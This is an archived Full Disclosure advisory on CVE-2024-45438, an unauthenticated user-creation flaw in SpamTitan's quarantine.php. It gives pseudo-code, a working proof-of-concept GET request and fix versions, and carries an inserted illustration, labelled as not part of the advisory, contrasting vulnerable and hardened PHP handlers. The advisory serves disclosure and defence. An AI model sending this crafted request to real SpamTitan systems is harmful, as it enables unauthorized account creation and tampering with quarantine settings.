CVE-2024-45438: Technical analysis of the SpamTitan unauthenticated user creation vulnerability
SpamTitan Email Security Gateway contains a high-severity vulnerability (CVE-2024-45438) with a CVSS score of 8.6. An attacker can create arbitrary user records by sending a crafted GET request to quarantine.php, with no authentication required. The vulnerability may lead to privilege escalation and information disclosure. Fixed in versions 8.00.101 and 8.01.14. 2025-9-8 22:27:0 Author: seclists.org


Full Disclosure mailing list archives


From: Seralys Research Team via Fulldisclosure <fulldisclosure () seclists org>
Date: Wed, 20 Aug 2025 14:40:55 +0000

    Seralys Security Advisory | https://www.seralys.com/research
        
======================================================================
Title:       Unauthenticated User Creation
Product:     SpamTitan Email Security Gateway
Affected:    Confirmed on 8.00.95 
Fixed in:    8.00.101 and 8.01.14
Vendor:      TitanHQ
Discovered:  May 2024
Severity:    HIGH
CWE:         CWE-306: Missing Authentication for Critical Function
CVE:         CVE-2024-45438
CVSS:        8.6 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)
Discovered by: Philippe Caturegli (Seralys) & Julian B.

======================================================================
Overview
--------

The file `quarantine.php` within the SpamTitan interface allows 
unauthenticated users to trigger account-level actions using a crafted 
GET request. Notably, when a non-existent email address is provided as 
part of the `email` parameter, SpamTitan will automatically create a 
user record and associate quarantine settings with it - all without 
requiring authentication.

This allows an attacker to manipulate internal application behavior 
or inject data into the user base, potentially leading to privilege 
escalation paths or information leaks in misconfigured environments.

======================================================================
Technical Details
-----------------

Affected Endpoint:
------------------
`quarantine.php`

Unauthenticated request triggers user creation:
```
/quarantine.php?language=en&role_type=admin&action=setperiod&email=admin@attacker.com&period=WD&secret_id=1
```

Pseudo-code logic (request handling):
```
// The address is taken straight from the query string and handed to the
// lookup helper; no session or authentication check happens first.
$email = $_GET['email'];
if (!empty($email)) {
    $user_id = db_getmaddr_id($email);   // second argument omitted -> $create = 1
}
```

Helper function (simplified behavior; `db_query()` stands in for the product's database layer):
```
function db_getmaddr_id($email, $create = 1) {
    // Look the address up in the `maddr` table
    $user_id = db_query("SELECT id FROM maddr WHERE email = ?", [$email]);
    if ($user_id === null && $create == 1) {
        // Not found and creation allowed (the default): the address is
        // inserted before the caller's action runs
        db_query("INSERT INTO maddr (email, domain) VALUES (?, ?)",
                 [$email, substr(strrchr($email, '@'), 1)]);
        $user_id = db_query("SELECT id FROM maddr WHERE email = ?", [$email]);
    }
    return $user_id;
}
```

- Because `db_getmaddr_id($email)` is invoked with only one argument,
  the default value `$create = 1` is used, which triggers implicit 
  user creation.
- No session or authentication checks are performed prior to 
  executing the action.
- The `role_type` parameter (e.g., `admin`) is accepted via query 
  string but never validated.
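As an added illustration (not SpamTitan's code and not part of the advisory), the vulnerable handler pattern described above next to a hardened version of the same action. The helpers `session_is_authenticated`, `quarantine_token_is_valid`, `db_getmaddr_id` and `db_set_digest_period`, and the `token_expiry` config key, are assumed names; the hardened handler authenticates first, refuses a token policy of 0 (which the vendor note below says disables tokens), ignores `role_type` from the query string, and calls the lookup with an explicit `$create = 0`.

```php
<?php
// Added example, not SpamTitan's code: the vulnerable pattern from the
// advisory next to a hardened handler. All helper functions are hypothetical.

// VULNERABLE: no authentication check, and db_getmaddr_id() is called with
// its default $create = 1, so an unknown address is inserted into `maddr`.
function handle_setperiod_vulnerable(array $get): ?int
{
    $email = $get['email'] ?? '';
    if ($email === '') {
        return null;
    }
    $user_id = db_getmaddr_id($email);               // implicit user creation
    db_set_digest_period($user_id, $get['period'] ?? '');
    return $user_id;
}

// HARDENED: authenticate first, validate input, and look up without creating.
function handle_setperiod_hardened(array $get, array $config): ?int
{
    // A report token is the only legitimate unauthenticated path. A token
    // policy of 0 (tokens disabled, see the vendor note) must not be honoured.
    $token_ok = ($config['token_expiry'] ?? 0) >= 1
        && quarantine_token_is_valid($get['secret_id'] ?? '', $get['email'] ?? '');
    if (!session_is_authenticated() && !$token_ok) {
        http_response_code(401);
        return null;
    }
    $email = filter_var($get['email'] ?? '', FILTER_VALIDATE_EMAIL);
    // 'WD' (weekly digest) is the only period code the advisory names;
    // add the product's other codes to this allow-list as appropriate.
    $period = $get['period'] ?? '';
    if ($email === false || !in_array($period, ['WD'], true)) {
        http_response_code(400);
        return null;
    }
    // role_type from the query string is ignored entirely: the caller's
    // role comes from the authenticated session, never from the request.
    // Explicit $create = 0: an unknown address is an error, not an insert.
    $user_id = db_getmaddr_id($email, 0);
    if ($user_id === null) {
        http_response_code(404);
        return null;
    }
    db_set_digest_period($user_id, $period);
    return $user_id;
}
```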

======================================================================
Proof of Concept
-----------------

Send the following GET request without authentication:

```
GET /quarantine.php?language=en&role_type=admin&action=setperiod&email=user@attacker.com&period=WD&secret_id=1 HTTP/1.1
Host: spamtitan.local
```

Effect:
- A new user `user@attacker.com` is silently created.
- Digest preference is set to "weekly".
- No authentication or token is required.

======================================================================
Impact
-------

- Unauthenticated creation of internal user records
- Manipulation of quarantine report settings for arbitrary email addresses
- Potential for denial of service or persistence via spam report hijacking
- Expands the application attack surface for further exploitation

======================================================================
Vendor Response
---------------

TitanHQ implemented fixes for this vulnerability as part of a 
coordinated disclosure effort. 

The issue has been resolved in the following versions: 
- SpamTitan Gateway v.8.00.101 
- SpamTitan Gateway v.8.01.14

Note: if a customer has set the token expiration period to 0 
(disabling tokens), then it would still be possible to add users. 
The quarantine settings page now shows a warning if a customer has 
this set to 0, and going forward it is not possible to set the token 
expiration period lower than 1.

======================================================================
Timeline
--------

- 2024-05-12: Vulnerability discovered during a pentest
- 2025-04-28: Advisory drafted (we kind of forgot about that vuln :))
- 2025-04-28: Initial advisory submitted to TitanHQ
- 2025-05-06: Follow up #1 from Seralys
- 2025-05-16: Follow up #2 from Seralys
- 2025-05-19: TitanHQ acknowledged receipt and initiated coordination
- 2025-06-13: TitanHQ publicly released a fix in v 8.00.101 and 8.01.14
- 2025-08-20: Public disclosure by Seralys

======================================================================
About Seralys
--------------

Seralys is a boutique penetration testing firm with offices in Europe
and North America. We provide high value-add penetration testing and 
security assessments.

https://www.seralys.com

======================================================================
Acknowledgments
---------------

Special shoutout to our fellow researchers at BastardLabs. \m/

======================================================================
Disclaimer
----------

This advisory is provided for coordinated disclosure purposes only.
Reproduction or distribution for malicious use is strictly prohibited.

EOF
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/



Source: https://seclists.org/fulldisclosure/2025/Sep/15